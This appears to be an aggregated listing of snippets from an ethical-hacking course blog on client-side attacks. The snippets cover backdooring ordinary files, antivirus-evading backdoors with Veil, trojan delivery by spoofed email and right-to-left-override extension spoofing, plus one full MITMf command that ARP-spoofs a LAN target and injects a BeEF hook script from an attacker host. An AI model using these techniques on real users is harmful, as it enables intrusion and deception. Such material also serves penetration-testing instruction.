Ethical Hacking - GAINING ACCESS(18)】的更多相关文章

CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to…
Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not require user interaction, all we need is a target IP! Start with information gathering, find open ports, OS, installed services, and work from there. (2)Cl…
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000…
CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backdoor is a file that gives us full control over the machine that it gets executed on. Backdoors can be caught by Anti-Virus programs. Veil is a framewor…
CLIENT SIDE ATTACKS Use if server-side attacks fail. If IP is probably useless. Require user interaction. Social engineering can be very useful. Information gathering is vital. Generating an undetectable backdoor using VEIL-EVASION https://github.com…
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan restult - services: Scan resulst - Vulnerabilities: Scan result - credentials: Try to login the database using the above cr…
CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the properties of the file. The file type of a trojan is application(.exe) , even if it looks like jpg\PDF or other files. Is it what it seems to be? Check Net…
CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook URL. DNS spoof requests to a page containing the hook. Inject the hook in brows…
CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract targets. (e.g. Maltego, Google ... etc.) Send an email pretending to be a friend. Online Tool: https://anonymousemail.me/ Ask them to open a link, downl…
CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a suitable one. Make the trojan even more trustable. We will use an old trick using the "right to left overload" character. 1. Open up the character…